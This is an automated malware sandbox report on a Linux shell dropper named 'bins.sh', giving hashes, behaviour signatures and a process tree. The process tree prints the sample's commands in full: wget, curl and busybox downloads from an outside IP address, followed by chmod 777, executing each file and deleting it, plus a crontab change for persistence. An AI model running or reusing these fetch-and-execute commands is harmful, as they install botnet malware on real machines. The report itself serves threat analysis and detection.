Analysis
-
max time kernel
150s -
max time network
149s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
31-10-2024 18:12
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
add9df3fe0956071f11080084a31bdeb
-
SHA1
f7ae02765b04a8c8e2a9f9c67fe20acd4516fd05
-
SHA256
baab79252bc9c7f91e534d97826913a53ccd378649706b77c8f448566dab641d
-
SHA512
2e6bd72689deb04f699f94d15949886de251783f5e5c037cd76647fc10b6777f1c7fa1659fbec5e824ef0427e152a3879744edfceed370b4a3213d41749cc84c
-
SSDEEP
96:9aG1ai9mSxkvymsIWTbbSb2bNbUb0bRG+aG1ai0SM9SvVkT7kmiec+vobbSb2bNj:7xkvymsIWTPK7GX
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 835 chmod 863 chmod 878 chmod 798 chmod 772 chmod 842 chmod 849 chmod 856 chmod 744 chmod -
Executes dropped EXE 9 IoCs
ioc pid Process /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe 745 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR 774 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj 799 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs 836 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb 843 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV 850 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ 857 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd 864 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd /tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 879 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 -
Renames itself 1 IoCs
pid Process 865 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.l8hddz crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/5/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/13/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/324/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/389/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/883/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/22/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/319/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/701/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/874/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/704/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/873/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/7/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/23/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/76/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/703/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/19/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/80/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/875/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/6/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/36/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/73/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/372/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/706/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/113/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/374/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/494/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/539/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/147/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/382/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/872/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/103/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/225/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems crontab File opened for reading /proc/10/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/15/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/78/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/24/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/82/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/877/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/filesystems crontab File opened for reading /proc/2/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/9/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/12/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/14/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/316/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/349/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/538/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/3/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/74/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/141/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/164/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/879/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/884/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/71/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/72/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/481/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1/cmdline KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 853 wget 854 curl 855 busybox 857 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ 859 rm -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV wget File opened for modification /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd wget File opened for modification /tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13 busybox File opened for modification /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe curl File opened for modification /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR busybox File opened for modification /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs wget File opened for modification /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV curl File opened for modification /tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV busybox File opened for modification /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ wget File opened for modification /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe busybox File opened for modification /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj wget File opened for modification /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs busybox File opened for modification /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb wget File opened for modification /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb curl File opened for modification /tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb busybox File opened for modification /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ curl File opened for modification /tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ busybox File opened for modification /tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe wget File opened for modification /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR wget File opened for modification /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj busybox File opened for modification /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd curl File opened for modification /tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd busybox File opened for modification /tmp/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN busybox File opened for modification /tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR curl File opened for modification /tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj curl File opened for modification /tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:704
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Writes file to tmp directory
PID:713
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Writes file to tmp directory
PID:740
-
-
/bin/chmodchmod 777 tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe./tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵
- Executes dropped EXE
PID:745
-
-
/bin/rmrm tbJRb0QOL8ycxxdt8zu52T0O9R6dapfXEe2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Writes file to tmp directory
PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod 777 IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR./IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm IUGjQGP9j20LhOTC222fZIrfyOuPYtk9iR2⤵PID:777
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Writes file to tmp directory
PID:778
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Writes file to tmp directory
PID:796
-
-
/bin/chmodchmod 777 eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- File and Directory Permissions Modification
PID:798
-
-
/tmp/eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj./eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm eBOhMFCgUagqZ1Aqh9SuqAFtqpUIghphWj2⤵PID:801
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Writes file to tmp directory
PID:802
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:803
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Writes file to tmp directory
PID:834
-
-
/bin/chmodchmod 777 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs./7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 7DEIG4dAfwusy79BtfKAhzmE18ezuAEPLs2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Writes file to tmp directory
PID:839
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Writes file to tmp directory
PID:841
-
-
/bin/chmodchmod 777 OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb./OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm OYvItG2UxnyJZrYRe6Z9aiD3X1ly0j0VJb2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Writes file to tmp directory
PID:846
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Writes file to tmp directory
PID:848
-
-
/bin/chmodchmod 777 zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV./zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm zsIFAllkjoP9OW7wU6Wz2wCuxbIamFuThV2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/chmodchmod 777 ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ./ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:857
-
-
/bin/rmrm ZtEzFIPWhdKnA10yJN3FUBBkxxdzRS4mmQ2⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Writes file to tmp directory
PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Writes file to tmp directory
PID:862
-
-
/bin/chmodchmod 777 KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd./KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:864 -
/bin/shsh -c "crontab -l"3⤵PID:866
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:867
-
-
-
/bin/shsh -c "crontab -"3⤵PID:868
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:869
-
-
-
-
/bin/rmrm KDBDhSt7ce4AH4R76TedzosCU6IiiU2hJd2⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- Writes file to tmp directory
PID:877
-
-
/bin/chmodchmod 777 PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/PdEZ8264siDtS3uUhD7KAvI2T1jba3WR13./PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm PdEZ8264siDtS3uUhD7KAvI2T1jba3WR132⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OSrXmMpJeMuegZ2t3HJk0GDIDlNWTeZoEN2⤵
- Writes file to tmp directory
PID:884
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
SHA123796112f2cce2afb2217498b5ecf2801ab550f2
SHA256d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2
SHA5129532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9
-
Filesize
84KB
MD564ece99ca4ab1c1405f5a3335d64a960
SHA1b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
-
Filesize
129KB
MD554bec959d900ad930dc662f8092da57d
SHA19ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
-
Filesize
24KB
MD52c164817262cdf2db80a789a8ed18588
SHA15774eb7a693e4b358f53d7be28679350c93de9f3
SHA256f379bc3507a95d5f45e51ba846a67fd58d0ec0198caf0d0a89de9d3f7d2c4f94
SHA512e480f484c1ba0a5db8ba533dd17ad7c66e8e97bf8997f55dd182ff233aebcc5dfaf05933b602041d8daec420706b128d88c62b7fe2221d730cc3763cbfd52c6d
-
Filesize
129KB
MD552f72bcf31899453b40d37a7cbf55f35
SHA16dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
122KB
MD5aadb8cc4b6eac7fce760c09262693884
SHA1b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA5125567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c
-
Filesize
80KB
MD522c527269cbd9b42f4ade79f52757efb
SHA1c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA5127b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53
-
Filesize
95KB
MD5c20c610e14b8e59f5f8258a55fe7f27d
SHA1e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
-
Filesize
101KB
MD5a7e686eb3f74b104a5520f08cfd54eb5
SHA158b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b
SHA256617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07
SHA5122767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df
-
Filesize
210B
MD5221a138a974caf5b20ff228e90929ebb
SHA17f525c8ae4220363d994a78f499493229f75a995
SHA2568b196ea7db5c07c24fae2809bcdbacfbffd854b11e6ee6c68e2da01e3b4b221c
SHA5121730bc5d7437f003ec9a74b92ffdcff4b5bf7491c1c7da31e65aa9b417972de7896c4b6ceabb57fb04c08086d9385536be2224197ba29947c34b81436072e5e7